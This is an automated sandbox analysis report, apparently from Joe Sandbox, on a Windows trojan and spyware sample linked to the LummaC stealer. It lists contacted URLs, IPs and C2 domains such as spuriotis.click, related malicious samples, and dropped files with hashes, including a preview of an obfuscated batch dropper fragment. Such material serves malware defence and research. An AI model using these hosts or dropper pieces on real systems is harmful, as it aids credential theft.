https://www.autoitscript.com/autoit3/	Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Fingers.18.dr	false		high
https://curl.se/docs/hsts.html	Set-up.exe.0.dr	false		high
https://spuriotis.click/3	Climb.com, 00000015.00000002.2509180090.00000000039A8000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.2331210727.00000000039A8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://spuriotis.click:443/apiocal	Climb.com, 00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://spuriotis.click/-	Climb.com, 00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	Climb.com, 00000015.00000003.1625219796.0000000005335000.00000004.00000800.00020000.00000000.sdmp	false		high
http://.jpg	es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://spuriotis.click/	Climb.com, 00000015.00000002.2509180090.00000000039A8000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.2331210727.00000000039A8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmp	false		high
https://curl.se/docs/http-cookies.html	es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13	Set-up.exe.0.dr	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.	Climb.com, 00000015.00000003.1625704012.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/X	Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000000.1364045625.0000000000185000.00000002.00000001.01000000.0000000B.sdmp, Fingers.18.dr	false		high
http://ocsp.rootca1.amazontrust.com0:	Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe, 00000007.00000000.1286723336.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe, 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe.0.dr	false		high
https://curl.se/docs/alt-svc.html	Set-up.exe.0.dr	false		high
https://www.ecosia.org/newtab/	Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmp	false		high
https://spuriotis.click:443/api	Climb.com, 00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Climb.com, 00000015.00000003.1625219796.0000000005335000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmp	false		high
https://httpbin.org/ipbefore	es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	Climb.com, 00000015.00000003.1625704012.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u	Climb.com, 00000015.00000003.1625704012.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e	Climb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	Climb.com, 00000015.00000003.1625704012.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta	Climb.com, 00000015.00000003.1625704012.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.128.184	spuriotis.click	United States	13335	CLOUDFLARENETUS	true
34.226.108.155	httpbin.org	United States	14618	AMAZON-AESUS	false
194.87.58.92	home.fortth14ht.top	Russian Federation	2118	RELCOM-ASRelcomGroup19022019RU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581590
Start date and time:	2024-12-28 09:33:27 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	es5qBEFupj.exe renamed because original name is a hash value
Original Sample Name:	25c8f6ada1179e3fcf486844e5c1ed24.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@28/23@11/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56, 20.109.210.53
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Set-up.exe, PID 7224 because there are no executed function
Execution Graph export aborted for target es5qBEFupj.exe, PID 5600 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:34:26	API Interceptor	1x Sleep call for process: PasoCattle.exe modified
03:34:34	API Interceptor	9x Sleep call for process: Climb.com modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.128.184	vUcZzNWkKc.exe	Get hash	malicious	LummaC	Browse
172.67.128.184	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse
34.226.108.155	s8kPMNXOZY.exe	Get hash	malicious	Unknown	Browse
	sYPORwmgwQ.exe	Get hash	malicious	Unknown	Browse
	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse
	f7qbEfJl0B.exe	Get hash	malicious	Unknown	Browse
	5KwhHEdmM4.exe	Get hash	malicious	Unknown	Browse
	dZsdMl5Pwl.exe	Get hash	malicious	Unknown	Browse
	OAKPYEH4c6.exe	Get hash	malicious	LummaC	Browse
	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse
	BkB1ur7aFW.exe	Get hash	malicious	Unknown	Browse
	5uVReRlvME.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc	Browse
194.87.58.92	vUcZzNWkKc.exe	Get hash	malicious	LummaC	Browse	home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
194.87.58.92	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse	home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
spuriotis.click	vUcZzNWkKc.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse	104.21.2.51
httpbin.org	s8kPMNXOZY.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	vUcZzNWkKc.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	GjZewfxHTi.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	sYPORwmgwQ.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	xdeRtWCeNH.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	f7qbEfJl0B.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	E205fJJS1Q.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	5KwhHEdmM4.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	QzK1LCSuq2.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
home.fortth14ht.top	vUcZzNWkKc.exe	Get hash	malicious	LummaC	Browse	194.87.58.92
	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse	194.87.58.92
	E205fJJS1Q.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	QzK1LCSuq2.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	OAKPYEH4c6.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	YrxiR3yCLm.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse	185.121.15.192

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
RELCOM-ASRelcomGroup19022019RU	vUcZzNWkKc.exe	Get hash	malicious	LummaC	Browse	194.87.58.92
	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse	194.87.58.92
	arm4.elf	Get hash	malicious	Unknown	Browse	194.58.66.244
	mips.elf	Get hash	malicious	Unknown	Browse	194.58.66.131
	ppc.elf	Get hash	malicious	Unknown	Browse	194.58.66.244
	hmips.elf	Get hash	malicious	Unknown	Browse	194.58.66.131
	harm4.elf	Get hash	malicious	Unknown	Browse	194.58.66.244
	harm5.elf	Get hash	malicious	Unknown	Browse	194.58.66.131
	hmips.elf	Get hash	malicious	Unknown	Browse	194.58.66.244
	arm7.elf	Get hash	malicious	Unknown	Browse	194.87.30.79
CLOUDFLARENETUS	vUcZzNWkKc.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	hx0wBsOjkQ.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	fnnGMmd8eJ.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	lumma.ps1	Get hash	malicious	LummaC	Browse	172.67.167.249
	BagsThroat.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	ronwod.exe	Get hash	malicious	LummaC	Browse	104.21.92.219
	ronwod.exe	Get hash	malicious	LummaC	Browse	172.67.198.222
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.166.49
	Loader.exe	Get hash	malicious	LummaC	Browse	172.67.132.7
AMAZON-AESUS	s8kPMNXOZY.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	vUcZzNWkKc.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	GjZewfxHTi.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	sYPORwmgwQ.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	xdeRtWCeNH.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	https://fin.hiringplatform.ca/processes/197662-tax-legislation-officer-ec-06-ec-07?locale=en	Get hash	malicious	Unknown	Browse	54.225.146.64
	d8tp5flwzP.exe	Get hash	malicious	Metasploit	Browse	18.209.65.151
	f7qbEfJl0B.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	E205fJJS1Q.exe	Get hash	malicious	LummaC	Browse	3.218.7.103

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	vUcZzNWkKc.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	hx0wBsOjkQ.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	MrIOYC1Pns.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	fnnGMmd8eJ.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	PW6pjyv02h.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	lumma.ps1	Get hash	malicious	LummaC	Browse	172.67.128.184
	BagsThroat.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.128.184
	ronwod.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	ronwod.exe	Get hash	malicious	LummaC	Browse	172.67.128.184

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\768400\Climb.com	vUcZzNWkKc.exe	Get hash	malicious	LummaC	Browse
	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse
	BagsThroat.exe	Get hash	malicious	LummaC Stealer	Browse
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse
	SoftWare(1).exe	Get hash	malicious	LummaC	Browse
	!Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse
	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse
	FloydMounts.exe	Get hash	malicious	LummaC Stealer	Browse

Created / dropped Files

C:\Users\user~1\AppData\Local\Temp\Symposium.cmd (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (1070), with CRLF line terminators
Category:	dropped
Size (bytes):	25405
Entropy (8bit):	5.118149909201556
Encrypted:	false
SSDEEP:	384:PALCiiNosKwu7ZXl+pn6ZkoUJJyL0pwyYSYrtNdVi5f9EQoVV2jUDnQycptEbVOt:PA55wEwp6iJY0GyYNVi5fq+jhrkRSdf
MD5:	23812A6E32E38911133B221F39F9A20B
SHA1:	5B3B155889AB3A04ABDD1F195753E817ED3FDB23
SHA-256:	D4913EAF90D499344DE0A1B21B97392DC09B3C3A7C503E544EFDD12CD4C289CF
SHA-512:	02F1BB5D6016076451B84C84CF8FD09FC62BD33EDBAE6A4EFF0BE94DF56652B14E321C9D098B19A52CDD9703507EBFC2A54B4812A96CD1F90F810EBC3A3D3F58
Malicious:	false
Preview:	Set Antenna=L..JNgTransport-Mail-Angola-Both-Directory-..klFlesh-Holders-Mx-Hugo-Guards-..ZhQThread-Say-Injury-Davis-Honda-..SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-..DiFSlot-Fucked-Rf-Shipping-Indianapolis-..mylSunset-Educators-Funky-..Set Content=2..VTkInd-Recorded-Dairy-Tons-Efficiency-..GCSpears-Associated-Adaptation-..BZReed-Protection-Treatment-Devel-Finish-Underwear-Earn-Recruitment-Relief-..ArpOriginal-Tigers-..SyJjPrevention-Eugene-Significant-Hair-Retail-Coding-Hospital-..InlSCottage-Vaccine-Wider-Computers-Level-Indian-Knowledge-Cleaning-..OCayChoosing-Closing-..vfWorldwide-Adequate-Notify-Icon-Vacation-Combat-Brass-..TQTaylor-..Set Advertisers=R..ndDenied-Weekend-Ticket-Like-Powerful-Intent-Olympic-..xyvvProved-Anonymous-Moved-Sword-Cargo-Employees-Foods-..hcpPossibly-Technology-Off-China-Biblical-Consolidated-Stan-..TCRoute-Essays-..vIqAGrades-August-Calculations-Rounds-Dk-Handjobs-Mali-Central-Columbus-..aYDKAcademy-Monitored-Accept-Parliame

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\es5qBEFupj.exe.log

Download File

Process:	C:\Users\user\Desktop\es5qBEFupj.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Temp\768400\Climb.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: vUcZzNWkKc.exe, Detection: malicious, Browse Filename: CLaYpUL3zw.exe, Detection: malicious, Browse Filename: BagsThroat.exe, Detection: malicious, Browse Filename: installer_1.05_36.4.exe, Detection: malicious, Browse Filename: SoftWare(1).exe, Detection: malicious, Browse Filename: !Setup.exe, Detection: malicious, Browse Filename: ZTM2pfyhu3.exe, Detection: malicious, Browse Filename: JA7cOAGHym.exe, Detection: malicious, Browse Filename: appFile.exe, Detection: malicious, Browse Filename: FloydMounts.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\768400\V

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	459790
Entropy (8bit):	7.999632331590964
Encrypted:	true
SSDEEP:	12288:P02pW2c56oA+/4hza+MglCQS9z/jgM/UB:w2LNMW6/gM/UB
MD5:	F9D71E9E58748BEEA3554073DCD205C8
SHA1:	0F059E563F46355BCA0866B3D7D0993DA4991C18
SHA-256:	45206C86B0AE3EB38240DD076201BE60B4983BBD0209CAA20516A9E6595C8BBA
SHA-512:	BBC015D43F281AF0D1CC75C3E41E13E09E5D24E9F23DB9FF5B6012E5D8978FD9C6C5C4A08B6262909660C606014BB375DCE1C4C909CA4B2D2CCA39722EBAF1A0
Malicious:	false
Preview:	.O.L..Q.HP.....g'V.,3?...p7;6}...9...<.B..C.f.JK.HF. .....7.C...p.o....:@....[v%.k.6.e..D.Y.(.p....t.[... ../l...$.6......U.6..Ye.Jw}h...i......l....P..s. .;..Z..O..\|....4...{.U.-..s.:Hbs!E.C...Md.x.b %....N.r.-1....3.z.^v..m.a.5.j........jy.dq..D...z...).74..b..Y..x....p.c@.z{....&.D..j.{..........`...^.G........Rpgf..+3........%.i.......A....wde......I1.3........Lq.fe...Jdr.+./.,7......v....}.Fr.P.......5cEZ.p.@.....#B.....L...Td......c.....X...........92 N..zn.N.....g.....CMG...:.X......i...MW....T>}%C....>..@.S.+.&.R.......a....D.~......."...... ...z....[.!....r..C.D..1[.}S..zC....C..gv..3../q...S........(..9M./[.X..t.w.Y..l.T'...$..L.>n........I:\.".i..D(..w....}7;.....2.n!X..l.........#.........D.QA...0p.e$/..7 .{/..H{3..i.U@....ye.....]..o....b.]+......i.$..$..^siT:..{....s...).p..G.C.8..J:.?...@"D.JY=.+["kSq..M..."?.`..r]......\|QT~dB..c..O..$.C...l...z..1.......m.W......k..`......HY2...Z..]....... ....>f...

C:\Users\user\AppData\Local\Temp\Alt

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	104448
Entropy (8bit):	5.172930596796904
Encrypted:	false
SSDEEP:	768:sc/mex/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVx:/PdKaj6iTcPAsAhxW
MD5:	BE1780E619FC600C90159E321A7BCBB9
SHA1:	C710D9B6E5843AD64355C032D4835707B245170E
SHA-256:	DBA6C4B6BEB02F24A6B4F3C7892605A06A8D99D5F65366C021B1337F1D192852
SHA-512:	F0BB5EB234DD25FBB7D7107839CBC9E72CBD1E269CA5F4445E245CBAC4CD8E6DD8966BB4DB08C0B0C88AB22E4A78E46CC3323E201E31E15E0E6E9D82C416D0ED
Malicious:	false
Preview:	................................................................................................................................................................................................b........\... ... \|....................................................................L...........I.....................................................................................0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F................?......Y@.....@.@......P?...........................(#...pqrstuvwxyz{$--%"!' .&,[\.....`abcdefghijkmno]......_..................................................................................................................................................1L..2L..2L..2L.$2L.42L.@2L.H2L.T2L.\2L.l2L.t2L.\|2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..3L..3L. 3L.,3L.43L.<3L.T3L.`3L.l3L..3L...J..3L..3L..3L..3L..3L..3L..3L..4L..4L.$4L.44L.D4L.T4L.l4L..4L..4L..4L..4L..4L..4L..4L..4L..4L..5L...J..5L.45L.P5L.p5L..5L..5L..5L..5L..6L.$6L.<6L.P6L.h6L..6L..6L..6L..6L

C:\Users\user\AppData\Local\Temp\Articles

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	268
Entropy (8bit):	4.968398681802287
Encrypted:	false
SSDEEP:	6:1qjvVg3F+X32+hZCt7HSbYwClS6CSNEcixNU:1yGSG+fCtJfjEvq
MD5:	41B7CDB6E286EE0E44962C8987B91D3C
SHA1:	E57E0B12ABC823CB91D3ACFA32AD63230405057D
SHA-256:	43F8E40249EC2FC185FDC323451FB72384EC9FF5910BD927C89CE8C41CACB58B
SHA-512:	B4423FD2C9D40D3715F93C6E130AF4B81CAA0B3BB3D23AF542D7043E6B91CAB1CCDDDBD2ECE8656736E4A3C594BAD99436432F4BD2EA2EA133FF381DCB8248CA
Malicious:	false
Preview:	cocks........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..

C:\Users\user\AppData\Local\Temp\Attractions

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	141312
Entropy (8bit):	6.686197497967684
Encrypted:	false
SSDEEP:	3072:fEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnj0nEoXnmowS2uI:sMVIPPL/sZ7HS3zcNPj0nEo3tb2j
MD5:	2ED9FFBA1FEA63AD6D178AEA296ED891
SHA1:	E0D1BB0AF918F8DDEE3FB3D593CAF0FC52C77709
SHA-256:	21B6E909F647CC2B1ADB6945ACEDA0EE2CB3DF2C91641D7609FFAB2DB6A40FA1
SHA-512:	52524AD966A8D72BB53ECBA0AC5EE5DC0DB6BE0569CC0E7E0C2D03B5266465C5162AD1048AD1B827E3BDCF985D0932E19336C2D5179BCD7E655E87BABB421055
Malicious:	false
Preview:	.U...........tB.E..M.}.G.}..H.E.;}.\|..%.......t.;.....v..Fh.............RY...}..}.........E...@..P.u.V.u..u............V.......;E...&....}..t.f.......f#......f;.u.....E...@..P.u.V.u..u..G........t............}......F\|.M.+..........C.........M.f9C...........]..e.....C.......%..........E.............U.......8....E...%....=....u".M................%.....M..........E.;.U...C.]........U..........L.............M.,K......K...;.............K......f;.w..F<.....E.............f;.w..F<.....E.;..............E..]..j.....C......E.U.......E.......C.3.U.E..(t..U...5u..E...........~3..E.........U...d......E.........U...N3..E.........U..E........;................+.....U.....+K.....+K..U.E..u..E......}......E..E...y...%.....E......]..E......E.....=....u<..C..].%...........E...........E............E.......]..E....E.}...]..Y.]..........r;.}.........L..............M.,K......K...;.t..U.......U....3..}..E...............E....M.F\|.}.+.;.w.Q.u.W.6n.......u.